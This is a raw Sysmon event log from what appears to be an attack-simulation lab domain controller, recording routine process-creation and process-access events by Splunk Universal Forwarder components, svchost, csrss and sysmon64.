--log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001975Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.769{D28789B6-7C76-5FA1-5300-000000008801}25483940C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001974Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C76-5FA1-5300-000000008801}2548C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001973Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001972Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001971Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001970Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001969Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001968Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001967Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001966Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001965Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C76-5FA1-5300-000000008801}2548C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001964Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C76-5FA1-5200-000000008801}39923988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7C76-5FA1-5300-000000008801}2548C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001962Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.528{D28789B6-7C76-5FA1-5300-000000008801}2548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C76-5FA1-5200-000000008801}3992C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000001961Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C76-5FA1-5200-000000008801}3992C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001960Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001959Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001958Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001957Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001956Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001955Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001954Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001953Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001952Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001951Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C76-5FA1-5200-000000008801}3992C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.519{D28789B6-7C75-5FA1-4D00-000000008801}40324028C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C76-5FA1-5200-000000008801}3992C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001949Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.523{D28789B6-7C76-5FA1-5200-000000008801}3992C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 